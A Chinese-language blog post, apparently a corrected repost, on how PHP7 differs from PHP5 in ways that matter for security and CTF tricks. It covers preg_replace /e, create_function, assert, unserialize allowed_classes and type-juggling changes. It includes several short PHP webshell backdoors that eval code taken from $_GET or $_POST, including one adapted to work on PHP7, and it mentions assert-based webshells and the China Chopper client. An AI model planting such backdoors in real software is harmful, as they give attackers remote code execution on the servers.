PHP7和PHP5在安全上的區別[更新]

0X01 前言

本篇文章大多爲轉載，可是修正了一些不正確的說法，對某些功能點的變動指出具體是哪一個版本變動，加入了一些小更新。

 （原文地址：https://www.freebuf.com/articles/web/197013.html ，做者：溫酒）

0x02 正文

函數修改

preg_replace()再也不支持/e修飾符

<?php
preg_replace("/.*/e",$_GET["h"],"."); 
?>

利用\e修飾符執行代碼的後門你們也用了很多了，具體看官方的這段描述:

若是設置了這個被棄用的修飾符， preg_replace() 在進行了對替換字符串的 後向引用替換以後, 將替換後的字符串做爲php 代碼評估執行(eval 函數方式)，並使用執行結果 做爲實際參與替換的字符串。單引號、雙引號、反斜線()和 NULL 字符在 後向引用替換時會被用反斜線轉義.

很不幸，在PHP7以上版本不在支持\e修飾符，同時官方給了咱們一個新的函數preg_replace_callback：

這裏咱們稍微改動一下就能夠利用它當咱們的後門：

<?php
preg_replace_callback("/.*/",function ($a){@eval($a[0]);},$_GET["h"]);
?>

create_function()被廢棄（廢棄於php 7.2，但依然可用）

<?php
$func =create_function('',$_POST['cmd']);$func();
?>　　

少了一種能夠利用當後門的函數，實際上它是經過執行eval實現的。無關緊要。

mysql_*系列全員移除

若是你要在PHP7上面用老版本的mysql_*系列函數須要你本身去額外裝了，官方不在自帶，如今官方推薦的是mysqli或者pdo_mysql。這是否預示着將來SQL注入漏洞在PHP上的大幅減小呢~

去特麼的預示，我已經好久沒在目標站上挖到過sql注入了，全都是預編譯！

unserialize()增長一個可選白名單參數

$data = unserialize($serializedObj1 , ["allowed_classes" => true]); $data2 = unserialize($serializedObj2 , ["allowed_classes" => ["MyClass1", "MyClass2"]]); 

其實就是一個白名單，若是反序列數據裏面的類名不在這個白名單內，就會報錯。

像這樣的報錯！

能夠是類名也能夠是布爾數據，若是是FALSE就會將全部的對象都轉換爲__PHP_Incomplete_Class對象。TRUE是無限制。也能夠傳入類名實現白名單。

媽的，還好如今是可選不是必選，要是默認FALSE逼程序員弄白名單那就真的吐血了。

assert()默認不在能夠執行代碼，（廢棄於php7.2，但依然可用）

這就是衆多馬不能用的罪魁禍首了，太多的馬用assert()來執行代碼了，這個更新基本就團滅，通常狀況下修改爲eval便可正常運行了~

提一下，菜刀在實現文件管理器的時候用的剛好也是assert函數，這致使菜刀沒辦法在PHP7上正常運行。

語法修改

foreach再也不改變內部數組指針

<?php
$a = array('1','2','3');
foreach ($a as $k=>&$n){
    echo "";
}
print_r($a);
foreach ($a as $k=>$n){
    echo "";

}
print_r($a);

　　

這樣的代碼在php5中，是這樣的執行結果：由於數組最後一個元素的 $value 引用在 foreach 循環以後仍會保留，在第二個循環的時候其實是對以前的指針不斷的賦值。php7中經過值遍歷時，操做的值爲數組的副本，不在對後續操做進行影響。

這個改動影響了某些cms的洞在PHP7上沒法利用了….你知道我指的是哪一個洞的。

這個問題在PHP7.0.0之後的版本又被改回去了，隻影響這一個版本。

8進制字符容錯率下降

在php5版本，若是一個八進制字符若是含有無效數字，該無效數字將被靜默刪節。

<?php
echo octdec( '012999999999999' ) . "\n";
echo octdec( '012' ) . "\n";
if (octdec( '012999999999999' )==octdec( '012' )){
        echo ": )". "\n";
}

　　

好比這樣的代碼在php5中的執行結果以下：

可是在php7裏面會觸發一個解析錯誤。

這個問題一樣在PHP7.0.0之後的版本又被改回去了，隻影響這一個版本。

十六進制字符串再也不被認爲是數字

這個修改一出，之後CTF套路會少不少啊~

不少騷操做都不能用了~

這個沒什麼好說的，你們都懂。

<?php
var_dump("0x123" == "291");
var_dump(is_numeric("0x123"));
var_dump("0xe" + "0x1");
var_dump(substr("foo", "0x1"));
?>

　　

以上代碼在PHP5運行結果以下：

PHP7運行結果以下：

你覺得我要說這個在後續版本被改回去了？不，目前截至最新的PHP7.3版本依然沒有改回去的徵兆，官方稱不會在改了。這個講道理仍是蠻傷的。

移除了 ASP 和 script PHP 標籤

如今只有<?php ?>這樣的標籤能在php7上運行了。（PS：還可使用<?= ?>）

字面意思，影響其實不是很大（只是之後騷套路會少一點）。

超大浮點數類型轉換截斷

將浮點數轉換爲整數的時候，若是浮點數值太大，致使沒法以整數表達的狀況下， 在PHP5的版本中，轉換會直接將整數截斷，並不會引起錯誤。 在PHP7中，會報錯。

CTF又少一個出題套路，這個問題我只在CTF上見過，影響應該不大。

用戶定義函數傳遞參數數量容錯率下降（PHP7.1以後）

php 5，雖然報警告，可是依舊能夠執行

php 7.0一樣

php 7.1 直接拋出錯誤

 

 此選項的變化致使能玩的花樣受到了限制，容錯率下降了。

eval()代碼執行容錯率下降（php 7.0以後）

意思是，在執行eval()代碼中有錯誤，將會直接返回，不會再執行。

php 5

php 7

 

 

雜項

exec(), system() passthru()函數對 NULL 增長了保護.

 

list()再也不能解開字符串string變量

 

$HTTP_RAW_POST_DATA 被移除

 

__autoload() 方法被廢棄（廢棄於php 7.2）

 

parse_str() 不加第二個參數會直接把字符串導入當前的符號表，若是加了就會轉換稱一個數組。如今是第二個參數是強行選項了。（變動於php 7.2，第二個參數應爲建議，不強制，依舊能夠不使用第二個參數）

 

統一不一樣平臺下的整型長度

 

session_start() 能夠加入一個數組覆蓋php.ini的配置